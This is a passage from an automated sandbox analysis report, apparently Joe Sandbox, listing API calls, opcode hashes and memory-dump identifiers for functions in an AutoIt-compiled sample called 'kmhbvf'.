                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 8743ca98b94d490d4eeea8aa4a770679c4eb770aae92df06800fd72145327ee2
                                                                  • Instruction ID: 1c50a610e066fbe8312a2b81f9a104ba9d091866a30486517d2e2241ad7ec294
                                                                  • Opcode Fuzzy Hash: 8743ca98b94d490d4eeea8aa4a770679c4eb770aae92df06800fd72145327ee2
                                                                  • Instruction Fuzzy Hash: 2F114C76204609DFC724CF29D481966F7E9FF49354720986EE58ADB261E732E881CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: bc3ff6b20b4e08c660cfcd2e986713c9488f0a20d7626c26cf04ced9957a9e7a
                                                                  • Instruction ID: 1e964d90158ba74dc3c0f92b3128eee03c8ed9581bf1c1a9286c1c3748d8ba94
                                                                  • Opcode Fuzzy Hash: bc3ff6b20b4e08c660cfcd2e986713c9488f0a20d7626c26cf04ced9957a9e7a
                                                                  • Instruction Fuzzy Hash: 2511257220834DABC7149F6DD881D7EB3D8EF85360B20526AFD19E7291EB319C508790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00EE3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00EE4276
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: f8e9090d76e1b39c9a17c0af3a6ac086a2817a6816c5ad7423d45673a4834345
                                                                  • Instruction ID: 10cf39853815d62d412616ab35227b0943b57da3f6670336a0591e54507d86c7
                                                                  • Opcode Fuzzy Hash: f8e9090d76e1b39c9a17c0af3a6ac086a2817a6816c5ad7423d45673a4834345
                                                                  • Instruction Fuzzy Hash: B1114FB1200B459FD730CF56D480B62B7F5EF88714F10D91DEAAA966A0D7B0F845DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                  • Instruction ID: 340ed370b895aba726cfca7bf0896d4be2a20f3ecc07fe125a5f1f4b9ef04ed4
                                                                  • Opcode Fuzzy Hash: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                  • Instruction Fuzzy Hash: 00017CB570054AABC305DB29C451D2AF7E9FF8A3503149169F919C7742DB31AC21CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy
                                                                  • String ID:
                                                                  • API String ID: 3048848545-0
                                                                  • Opcode ID: 723712a67ac4c7bb138e4dcb30ed5178b0b7e88fe59e113297e06dfd62ddb98d
                                                                  • Instruction ID: 07478dedf0e7ea2ce7483735e46fbb0d4c6dabb09728fbc7db9b214ff1976139
                                                                  • Opcode Fuzzy Hash: 723712a67ac4c7bb138e4dcb30ed5178b0b7e88fe59e113297e06dfd62ddb98d
                                                                  • Instruction Fuzzy Hash: 10E0EC3231C354265915262A9C828BAB3DDDF85330310126BF501B72D2DE5329465165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _fseek
                                                                  • String ID:
                                                                  • API String ID: 2937370855-0
                                                                  • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                  • Instruction ID: 1d3e5a943ded4b5fdc9a6c50b3f74e9a605b2f0307644b8dec198f92e2a56fb1
                                                                  • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                  • Instruction Fuzzy Hash: 1AF08CB6400208BFDF108F45DC00CEB7BB9EB85320F004198F9045A211D232EA219BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,00EE27AF,?,00000001), ref: 00EE4A63
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: 028e41bccb4a59893289488cf9214521df6aae6937384aacf36ca3ea56f991f8
                                                                  • Instruction ID: cad7acc28a505a6e61bd7fcabc5d59cfc064d918bc9c77b1368f5126c08e24b3
                                                                  • Opcode Fuzzy Hash: 028e41bccb4a59893289488cf9214521df6aae6937384aacf36ca3ea56f991f8
                                                                  • Instruction Fuzzy Hash: D9F0A9B1140749CFCB349F26E480826BBF0BF1432A320A93EE2EBA3650D7319980DF04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock
                                                                  • String ID:
                                                                  • API String ID: 2638373210-0
                                                                  • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                  • Instruction ID: 2b2ecdbf7b7f176b013bdb6dd090c17fb14a081934b0777568f25c1ed6c056ce
                                                                  • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                  • Instruction Fuzzy Hash: 31F0587280020DFFDF04CF80C941EAABB79FB14324F208189F9199A212D332DA21EB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EF09E4
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath_memmove
                                                                  • String ID:
                                                                  • API String ID: 2514874351-0
                                                                  • Opcode ID: 908073d27e8a885125e3e94ca3726d25eeff32688035f4a4e2431fc37b2cdbf6
                                                                  • Instruction ID: 68ebd106d76d3d2d4125ac19260f426e081aae53e25f8727d136ede4dde52758
                                                                  • Opcode Fuzzy Hash: 908073d27e8a885125e3e94ca3726d25eeff32688035f4a4e2431fc37b2cdbf6
                                                                  • Instruction Fuzzy Hash: C2E0863290012857C721A6989C06FEA77DDEB89791F0401B6FC08D7354D9649C819691
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00F206E6,00000000,00000000,00000000), ref: 00EE42BF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: d38d2464db9d9f0bb1335880f90e59db673fcc5cd2ab141b1f58678328103818
                                                                  • Instruction ID: 11ddc14d57cd5524d6c2996fe9c949804cc36d61b663558c744b72e34d5564bd
                                                                  • Opcode Fuzzy Hash: d38d2464db9d9f0bb1335880f90e59db673fcc5cd2ab141b1f58678328103818
                                                                  • Instruction Fuzzy Hash: 7FD0C97464020CBFEB10CB80DC46FAABBBCEB05710F200294FE04A6290E6F27E509B95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EF3447: __lock.LIBCMT ref: 00EF3449
                                                                  • __onexit_nolock.LIBCMT ref: 00EF2E90
                                                                    • Part of subcall function 00EF2EB8: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2ECB
                                                                    • Part of subcall function 00EF2EB8: DecodePointer.KERNEL32(?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2ED6
                                                                    • Part of subcall function 00EF2EB8: __realloc_crt.LIBCMT ref: 00EF2F17
                                                                    • Part of subcall function 00EF2EB8: __realloc_crt.LIBCMT ref: 00EF2F2B
                                                                    • Part of subcall function 00EF2EB8: EncodePointer.KERNEL32(00000000,?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2F3D
                                                                    • Part of subcall function 00EF2EB8: EncodePointer.KERNEL32(00F0B7EA,?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2F4B
                                                                    • Part of subcall function 00EF2EB8: EncodePointer.KERNEL32(00000004,?,?,00EF2E95,00F0B7EA,00F8CB50), ref: 00EF2F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                                  • String ID:
                                                                  • API String ID: 3536590627-0
                                                                  • Opcode ID: 6e2545c81b8f2723d909cfb3a489df81561e97f6b447945dfdf5c28bfb543d70
                                                                  • Instruction ID: c4676e44813c170ce967eb3f829c7ab80029d61e5d9cfdd7fbaa35574f38528f
                                                                  • Opcode Fuzzy Hash: 6e2545c81b8f2723d909cfb3a489df81561e97f6b447945dfdf5c28bfb543d70
                                                                  • Instruction Fuzzy Hash: BBD01271D1020DEADB11BBA4D90277D76F06F10722F605149F624762C2CB744A425BD5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __wfsopen
                                                                  • String ID:
                                                                  • API String ID: 197181222-0
                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                  • Instruction ID: 4f404d61f142ea234910a4f5695b754fbb8d719f342942b12fa6782e1ce0150e
                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                  • Instruction Fuzzy Hash: D8B0927644020CB7CE112A82EC03A693F699B50668F408020FB1C2C162B673E6A09689
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 00F3D842
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: e06cccc9f9934072cdccc63745db89ca248e74fa98c020ca89afaa24aa1cc96e
                                                                  • Instruction ID: 979adfcbb3007cab361360a0020b87446d110684d8c81d43ed732f89c20eada5
                                                                  • Opcode Fuzzy Hash: e06cccc9f9934072cdccc63745db89ca248e74fa98c020ca89afaa24aa1cc96e
                                                                  • Instruction Fuzzy Hash: F971C2306043058FC704EF64D491A6EB7E0EF88324F141A6DF896A73A2DB30ED45DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: 3d45f9123b512de9052f05769294adedb4ff69c087139f60d3490cddbc7a827f
                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: 8231C571A0010ADFDB19DF58C4809B9F7A6FF59304B649AA5E50AEB252E731EDC1CBC0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F5D208
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5D249
                                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F5D28E
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F5D2B8
                                                                  • SendMessageW.USER32 ref: 00F5D2E1
                                                                  • _wcsncpy.LIBCMT ref: 00F5D359
                                                                  • GetKeyState.USER32 ref: 00F5D37A
                                                                  • GetKeyState.USER32 ref: 00F5D387
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5D39D
                                                                  • GetKeyState.USER32 ref: 00F5D3A7
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F5D3D0
                                                                  • SendMessageW.USER32 ref: 00F5D3F7
                                                                  • SendMessageW.USER32(?,00001030,?,00F5B9BA), ref: 00F5D4FD
                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F5D513
                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F5D526
                                                                  • SetCapture.USER32(?), ref: 00F5D52F
                                                                  • ClientToScreen.USER32(?,?), ref: 00F5D594
                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F5D5A1
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F5D5BB
                                                                  • ReleaseCapture.USER32(?,?,?), ref: 00F5D5C6
                                                                  • GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 00F5D600
                                                                  • ScreenToClient.USER32 ref: 00F5D60D
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F5D669
                                                                  • SendMessageW.USER32 ref: 00F5D697
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F5D6D4
                                                                  • SendMessageW.USER32 ref: 00F5D703
                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F5D724
                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F5D733
                                                                  • GetCursorPos.USER32(?), ref: 00F5D753
                                                                  • ScreenToClient.USER32 ref: 00F5D760
                                                                  • GetParent.USER32(?), ref: 00F5D780
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F5D7E9
                                                                  • SendMessageW.USER32 ref: 00F5D81A
                                                                  • ClientToScreen.USER32(?,?), ref: 00F5D878
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F5D8A8
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F5D8D2
                                                                  • SendMessageW.USER32 ref: 00F5D8F5
                                                                  • ClientToScreen.USER32(?,?), ref: 00F5D947
                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F5D97B
                                                                    • Part of subcall function 00ED29AB: GetWindowLongW.USER32(?,000000EB), ref: 00ED29BC
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F5DA17
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                  • String ID: @GUI_DRAGID$F
                                                                  • API String ID: 3977979337-4164748364
                                                                  • Opcode ID: c3c84f801fb3895c48e82881cf795874e86fd8d188652fdc7890b774c9e4ea2f
                                                                  • Instruction ID: 9cbab2c7f88b568a6237a4a0e0d934851826e17941ea9769ef667c24ea31a2af
                                                                  • Opcode Fuzzy Hash: c3c84f801fb3895c48e82881cf795874e86fd8d188652fdc7890b774c9e4ea2f
                                                                  • Instruction Fuzzy Hash: 1D42BF30606745AFD734DF24C844F6ABBE5FF48321F140519FA95872A1CBB1D858EBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00EE5EE2
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F210D7
                                                                  • IsIconic.USER32 ref: 00F210E0
                                                                  • ShowWindow.USER32(?,00000009), ref: 00F210ED
                                                                  • SetForegroundWindow.USER32(?), ref: 00F210F7
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F2110D
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F21114
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F21120
                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F21131
                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F21139
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F21141
                                                                  • SetForegroundWindow.USER32(?), ref: 00F21144
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F21159
                                                                  • keybd_event.USER32 ref: 00F21164
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F2116E
                                                                  • keybd_event.USER32 ref: 00F21173
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F2117C
                                                                  • keybd_event.USER32 ref: 00F21181
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F2118B
                                                                  • keybd_event.USER32 ref: 00F21190
                                                                  • SetForegroundWindow.USER32(?), ref: 00F21193
                                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 00F211BA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
